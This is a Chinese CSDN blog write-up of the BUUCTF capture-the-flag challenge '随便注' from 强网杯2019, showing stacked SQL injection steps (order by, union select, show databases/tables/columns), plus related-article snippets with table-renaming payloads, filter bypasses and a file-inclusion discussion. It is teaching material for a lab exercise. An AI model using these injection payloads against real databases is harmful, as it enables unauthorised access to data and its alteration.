【BUUCTF】web之强网杯2019随便注

最新推荐文章于 2025-04-09 16:44:47 发布
最新推荐文章于 2025-04-09 16:44:47 发布
阅读量460 收藏
点赞数 2
分类专栏: ctf 文章标签: 数据库 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44164784/article/details/105367763
版权

开始注入:
1’ : 报错
1’ #:回显正常
1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜)
1’ union select 1,2#: 回显 如图不管怎样就喜欢有挑战性的,傲娇
看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入:
库:1’;show databases;#
得到数据库数据库
表:1’;show tables;#
得到俩个表表
列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 `` 注:在网上百度发现
得到 一个带有flag的字段 和 另一个 可查询的表
flag表:在这里插入图片描述可查询表:

最低0.47元/天 解锁文章
BUUCTF系列 // [强网2019] 随便
qq_45805420的博客
09-23 715
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
BUUCTF[强网2019]随便
楼阁de猫的博客
09-23 636
[强网2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
buuctf[强网2019随便]
最新发布
2403_89727669的博客
04-09 299
但是他的数据类型为int,而data与flag的类型均为varchar,所以我们在这里获得思路,可以将。发现words里面有两个字段,另一个只有一个字段,所以后台的查询语句应为。中新添加id字段,然后words的名字改为任意的,输入有关select的命令发现。
BUUCTF [强网 2019]随便
qq_42158602的博客
01-09 1298
打开题目看见一个输入框 输入’报错 应该是有sql入了 使用 1’ # 正确显示 直接上 order by 1' order by 3 # 测试1,2正常,3报错 此时天真的我以为我已经离成功不远了~~ 启动联合查询 -1' union select 1,2 # 提交 继续 ...
BUUCTF Web [强网 2019]随便
2501_90251165的博客
01-16 916
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容。
buuctf web [强网 2019]高明的黑客
m0_46412682的博客
07-20 745
buuctf web [强网 2019]高明的黑客 开始的页面 既然页面上有提示,我们就输入www.tar.gz 有文件压缩包,我们下载下来,压缩打开后,有几千个文件 这里我们随便打开一个文件,这里有很多shell,但是很多是用不了的,所以要用python来测试,不可能手动 import requests import os import re import threading import time session = requests.Session() session.keep_
[强网 2019]随便
kuller_Yan的博客
05-18 313
[强网 2019]随便 wp from Kuller_Yan 原理:堆叠入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句 后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠入。 而union injection(联合入)也是将两条语句合并在一起,两者之间有什么区别么? 区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句, 而堆叠入可以执行的是任意的语句。例如以下这个例子。 用户输入:1; D
强网2019 随便
BlueDoorZz的博客
07-11 489
没什么好说的,教程一搜一大堆。 这题过滤了select,updata,where等关键字,不能使用常规的方法进行入,可以考虑堆叠入。 查表名:1';show tables;# 查列名:1';show cloumns from XXXX;# 查看flag有两种方式: 一 1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `fla
(转载)强网2019 随便
yingyugo的博客
11-24 300
虽然题目做得不多但是工具这题考察的知识面很广 尝试入: 1,测试 1’ or 1=1 # ,初步判定存在SQL入。 1' or 1=1 # 再测试字段数,到3时报错,说明字段数为2. 1' order by 1 # 接着尝试union入,回显了过滤的关键字。 1’ union select 1,2# 然后就是今天学会的新姿势“堆叠入”了。 原理很简单,就是通过 ; 号入多条SQL语句。 先通过show databases爆出数据库。 0'; show databases; # 然后
BUUCTF[强网 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网 2019]随便 1’ or 1=1 #
CTF-BUUCTF-Web-[强网 2019]高明的黑客
qq_42404383的博客
01-01 821
CTF-BUUCTF-Web-[强网 2019]高明的黑客 如题: 解题: 没看到其他任何提示,直接down下源码 我的娘哦!这要看到何时去? 盲猜大概要自己写脚本,然后分析代码 [致敬大佬,借用脚本]: https://blog.youkuaiyun.com/xiayu729100940/article/details/102676405 import os import requests impor...
BUUCTF-web-随便
nareku的博客
07-06 1423
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF-[强网 2019]随便
网络空间安全学习
06-28 297
首先,正常是查words表的数据,我们先将words表重命名成别的,名字任意。查看表的字段信息,发现flag,但是我们没有办法查看flag的内容,我们再看看words表中的数据字段。表改名,改为words,将flag字段改为id,然后在使用万能钥匙爆数据。观察发现,我们查出来的数据,可能就是words表当中的数据,我们可以将。意:表名如为数字时候,使用``引用,否则不能正常查看信息。输入3报错,将3换成2,若不报错,则说明该表有2列字段。最后,使用万能钥匙,爆表的数据。正常的提交数据,可查询出信息。
BUUCTFWEB】题:随便
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-12 511
可以发现,1919810931114514表中有个名为 flag 的字段,很可能该字段的值就是真正的 flag;:预编译相当于定一个语句相同,参数不同的Mysql模板,我们可以通过预编译的方式,绕过特定的字符过滤。进去之后,发现就一个输入框,测试一下是否存在 SQL 入,输入万能语句:1' or 1 = 1#将 select 转换成对应的 ASCII 码,从而绕过对 select 的过滤。发现表都爆出来了,说明存在 SQL 入漏洞,进一步测试一些其他语句是否可行。举例:查询 id = 1 的用户。
[强网]easy_sql
fightte的博客
05-17 1089
提交1和2会回显一个数组: 相当于1对应的值为“hahahah” 是key-value形式的输出。 尝试输入1’.返回报错,有入漏洞 尝试1’or 1=1#,并用#截断,输出了三个数组: 尝试堆叠入,即入多组sql语句,其中有;隔开, 输入show databases返回了所有的数据表, 尝试查询表名:show tables; 显示了表的名字,在使用sql语句,show columns from xx,来查询其中列的名称: 上图是word的列名, 下图,再查出1919…中的列名: 用sql
BUUCTF Web [强网 2024]随便
2401_86454378的博客
09-04 1012
进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。在输入框中输入一个2,即可查询2对应的内容喜欢一个东西首先要先学会「尊重」,虽然网络安全的圈子不乏各种灰产,以及高调宣传自己是黑客的脚本小子,但不可否认,这个圈子仍有不少人保持着「举世皆浊我独清,众人皆醉我独醒」的心态,努力磨砺技术,提升自身修养,让互联网变得更加安全
buuctf web exec
02-19
### 关于BUUCTF Web类题目执行的方法 #### 文件包含漏洞利用 在处理文件包含漏洞时,了解服务器端如何解析并加载指定文件至关重要。对于给定的PHP代码片段[^3]: ```php <?php highlight_file(__FILE__); error_reporting(0); $file = $_GET['file']; if (strstr($file, "../") || stristr($file, "tp") || stristr($file, "input") || stristr($file, "data")) { echo "Oh no!"; exit(); } include($file); ?> ``` 这段代码展示了对`$_GET['file']`参数进行了过滤,防止访问特定路径下的文件以及含有敏感字符(如"../", "tp", "input", 和"data")的文件。 然而,攻击者可以尝试绕过这些限制来读取其他文件的内容。例如,如果目标是在同一目录下查找名为`flag.php`的文件,则可以通过构造合适的请求实现这一点。假设存在一个未被阻止的关键字或路径组合,那么就可以成功触发文件包含操作。 #### SQL入与堆叠查询 SQL入是一种常见的Web安全漏洞,允许恶意用户通过输入特殊构造的数据操纵后台数据库的行为。当提到MySQL中的默认结束符`;`用于分隔多个命令时,这表明可能存在所谓的“堆叠入”,即在同一查询字符串内附加额外的有效负载以执行更多指令[^2]。 例如,在某些情况下,如果应用程序未能正确清理用户的输入,并且允许提交带有分号(`;`)和其他合法SQL语法结构的数据,就有可能造成意外的结果集返回甚至修改数据表内的记录。 为了防范此类风险,开发者应当始终遵循最佳实践原则——采用预编译语句、绑定变量等方式替代直接拼接字符串作为最终发送到DBMS上的查询文本;同时还要意设置适当的安全策略控制哪些类型的HTTP请求能够到达相应的API接口层面上去。 #### 实际案例分析 针对具体实例而言,比如强网2024比赛中遇到的一道叫做《随便》的CTF挑战题,其核心在于识别出可利用之处并通过精心设计payload达成预期目的。这类竞赛往往鼓励参赛选手深入研究官方文档和技术资料,从中挖掘潜在弱点所在。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值